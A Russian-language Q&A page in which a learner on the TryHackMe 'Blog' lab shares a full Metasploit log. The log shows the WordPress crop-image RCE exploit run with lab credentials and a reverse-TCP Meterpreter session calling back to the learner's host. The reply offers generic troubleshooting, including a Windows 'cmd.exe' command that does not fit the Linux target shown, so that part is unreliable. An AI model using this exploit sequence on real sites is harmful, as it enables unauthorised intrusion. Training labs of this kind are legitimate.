Команда “Shell” не работает в Meterpreter [закрыто]

Вопрос или проблема

Я учусь использовать Metasploit для эксплуатации сайта WordPress, предоставленного TryHackMe.com
https://tryhackme.com/r/room/blog

У меня возникли трудности с meterpreter. Он всегда возвращает ошибку, когда я ввожу команду shell.

meterpreter > shell
[-] Ошибка выполнения команды shell: Rex::ArgumentError был указан неприемлемый аргумент. Неизвестный тип для аргументов

Я не понимаю, почему у меня возникает ошибка, в то время как руководство на YouTube этого не делает, так как я следую точным инструкциям.
https://www.youtube.com/watch?v=zmK_hg6hIM0&t=166s

Любые комментарии приветствуются и будут очень полезны. Спасибо, ребята.

Вот полные команды.

msf6 > search wordpress date:2019

Совпадающие модули
================

   #  Название                                       Дата раскрытия  Ранг       Проверка  Описание
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_db_backup_rce            2019-04-24       отличный  Да    WP Database Backup RCE
   1    \_ цель: Windows                           .                .          .      .
   2    \_ цель: Linux                             .                .          .      .
   3  exploit/multi/http/wp_crop_rce                 2019-02-19       отличный  Да    WordPress Crop-image Shell Upload
   4  auxiliary/scanner/http/wp_email_sub_news_sqli  2019-11-13       нормальный     Нет     Сканер SQLi для WordPress Email Subscribers и Newsletter Hash
   5  auxiliary/admin/http/wp_google_maps_sqli       2019-04-02       нормальный     Да    SQL Injection для плагина Google Maps WordPress


Взаимодействуйте с модулем по имени или индексу. Например info 5, use 5 или use auxiliary/admin/http/wp_google_maps_sqli                                                                                                                

msf6 > use exploit/multi/http/wp_crop_rce
[*] Не настроен полезный груз, по умолчанию используется php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_crop_rce) > show options

Опции модуля (exploit/multi/http/wp_crop_rce):

   Название      Текущая настройка  Обязательный  Описание
   ----         ---------------  ---------  -----------
   PASSWORD                     да       Пароль WordPress для аутентификации
   Прокси                      нет       Цепочка прокси формата type:host:port[,type:host:port][...]
   RHOSTS                       да       Целевой хост(ы), см. https://docs.metasploit.com/docs/using-metaspl
                                         oit/basics/using-metasploit.html
   RPORT      80                да       Целевой порт (TCP)
   SSL        false             нет      Вести переговоры по SSL/TLS для исходящих подключений
   TARGETURI  /                да       Базовый путь к приложению wordpress
   THEME_DIR                    нет      Имя каталога темы WordPress (отключите автоматическое определение темы, если предоставлено
                                         )
   USERNAME                     да       Имя пользователя WordPress для аутентификации
   VHOST                        нет      Виртуальный хост HTTP


Опции полезного груза (php/meterpreter/reverse_tcp):

   Название   Текущая настройка  Обязательный  Описание
   ----       ---------------  ---------  -----------
   LHOST  10.0.2.15         да       Адрес прослушивания (можно указать интерфейс)
   LPORT  4444              да       Порт прослушивания


Цель эксплуатации:

   Id  Название
   --  ----
   0   WordPress



Просмотрите полную информацию о модуле с помощью информации или команды info -d.

msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS blog.thm
RHOSTS => blog.thm
msf6 exploit(multi/http/wp_crop_rce) > set LHOST 10.4.109.11
LHOST => 10.4.109.11
msf6 exploit(multi/http/wp_crop_rce) > set LPORT 1560
LPORT => 1560
msf6 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf6 exploit(multi/http/wp_crop_rce) > set PASSWORD cutiepie1
PASSWORD => cutiepie1
msf6 exploit(multi/http/wp_crop_rce) > run

[*] Запущен обработчик обратного TCP на 10.4.109.11:1560 
[*] Аутентификация с WordPress с использованием kwheel:cutiepie1...
[+] Аутентифицировано с WordPress
[*] Подготовка полезного груза...
[*] Загрузка полезного груза
[+] Изображение загружено
[*] Включение в тему
[*] Отправка стадии (40004 байт) на 10.10.189.47
[*] Открыта сессия Meterpreter 1 (10.4.109.11:1560 -> 10.10.189.47:60582) в 2024-11-01 15:40:30 -0400
[*] Попытка очистки файлов...

meterpreter > shell
[-] Ошибка выполнения команды shell: Rex::ArgumentError был указан неприемлемый аргумент. Неизвестный тип для аргументов
meterpreter > shell
[-] Ошибка выполнения команды shell: Rex::ArgumentError был указан неприемлемый аргумент. Неизвестный тип для аргументов
meterpreter > ls
Список: /var/www/wordpress
===========================

Режим               Размер   Тип  Последнее изменение              Имя
----               ----   ----  -------------              ----
100640/rw-r-----  235    fil   2020-05-28 08:15:42 -0400  .htaccess
100640/rw-r-----  235    fil   2020-05-27 23:44:26 -0400  .htaccess_backup
100640/rw-r-----  418    fil   2013-09-24 20:18:11 -0400  index.php
100640/rw-r-----  19935  fil   2020-05-26 11:39:37 -0400  license.txt
100644/rw-r--r--  1112   fil   2024-11-01 15:40:25 -0400  ofVQZvznEI.php
100640/rw-r-----  7415   fil   2020-05-26 11:39:37 -0400  readme.html
100640/rw-r-----  5458   fil   2020-05-26 11:39:37 -0400  wp-activate.php
040750/rwxr-x---  4096   dir   2018-12-06 13:00:07 -0500  wp-admin
100640/rw-r-----  364    fil   2015-12-19 06:20:28 -0500  wp-blog-header.php
100640/rw-r-----  1889   fil   2018-05-02 18:11:25 -0400  wp-comments-post.php
100640/rw-r-----  2853   fil   2015-12-16 04:58:26 -0400  wp-config-sample.php
100640/rw-r-----  3279   fil   2020-05-27 23:49:17 -0400  wp-config.php
040750/rwxr-x---  4096   dir   2020-05-25 23:52:32 -0400  wp-content
100640/rw-r-----  3669   fil   2017-08-20 00:37:45 -0400  wp-cron.php
040750/rwxr-x---  12288  dir   2018-12-06 13:00:08 -0500  wp-includes
100640/rw-r-----  2422   fil   2016-11-20 21:46:30 -0400  wp-links-opml.php
100640/rw-r-----  3306   fil   2017-08-22 07:52:48 -0400  wp-load.php
100640/rw-r-----  37286  fil   2020-05-26 11:39:37 -0400  wp-login.php
100640/rw-r-----  8048   fil   2017-01-11 00:13:43 -0500  wp-mail.php
100640/rw-r-----  17421  fil   2018-10-23 03:04:39 -0400  wp-settings.php
100640/rw-r-----  30091  fil   2018-04-29 19:10:26 -0400  wp-signup.php
100640/rw-r-----  4620   fil   2017-10-23 18:12:51 -0400  wp-trackback.php
100640/rw-r-----  3065   fil   2016-08-31 12:31:29 -0400  xmlrpc.php

meterpreter > 

.

Ответ или решение

Проблема с командой "shell", не работающей в Meterpreter, может иметь несколько причин, и в данном ответе мы рассмотрим основные из них.

1. Причины ошибки

При попытке вызвать команду shell в Meterpreter и получении ошибки Rex::ArgumentError An invalid argument was specified. Unknown type for arguments следует учитывать, что данная проблема может быть связана с:

  • Ошибками в версии Metasploit или Meterpreter: Бывает, что версию Metasploit (или его компоненты) необходимо обновить до последней, так как ошибки и баги часто исправляются разработчиками.
  • Несоответствующим типом сессии: Неправильная сессия также может привести к этой ошибке. Убедитесь, что Meterpreter сессия корректно установлена и активна.
  • Ограничениями окружения: В некоторых случаях системы безопасности могут блокировать определенные команды, или среда может быть настроена для работы в ограниченных режимах.

2. Решения

Для устранения проблемы попробуйте следующие шаги:

Шаг 1: Обновление Metasploit

Убедитесь, что вы используете последнюю версию Metasploit, так как в новых версиях исправляются старые ошибки и добавляются новые функции.

msfupdate

Шаг 2: Проверка сессии Meterpreter

Проверьте, активна ли сессия и соответствует ли она ожидаемому типу. Введите команду sessions для показа активных сессий:

msf6 > sessions

Если ваша сессия активна, убедитесь, что она правильно настроена и не была прервана.

Шаг 3: Попробуйте другие команды

Попробуйте выполнить другие команды, такие как sysinfo или getuid для проверки состояния сессии и получения информации о целевой системе. Это поможет определить, правильно ли работает Meterpreter.

meterpreter > sysinfo
meterpreter > getuid

Шаг 4: Альтернативные методы доступа

Если команда shell все еще не работает, попробуйте использовать другие команды для взаимодействия с целевой системой. Например, вы можете попробовать execute, чтобы запускать команды на целевой системе.

meterpreter > execute -f cmd.exe -i -t

3. Проверка документации

Если приведенные выше шаги не помогли решить проблему, рекомендуется обратиться к документации по Metasploit и Meterpreter. Часто проблемы могут быть уникальными, и документация может предложить специфичные решения.

Заключение

Ошибки, связанные с командой shell, могут быть следствием различных факторов, таких как версия софта, тип сессии или окружение. Выполнив предложенные выше рекомендации, вы сможете устранить проблему и наладить стабильную работу Meterpreter. Не забывайте, что документация и сообщество могут стать отличным ресурсом для поиска дополнительных решений.

Оцените материал
Добавить комментарий

Капча загружается...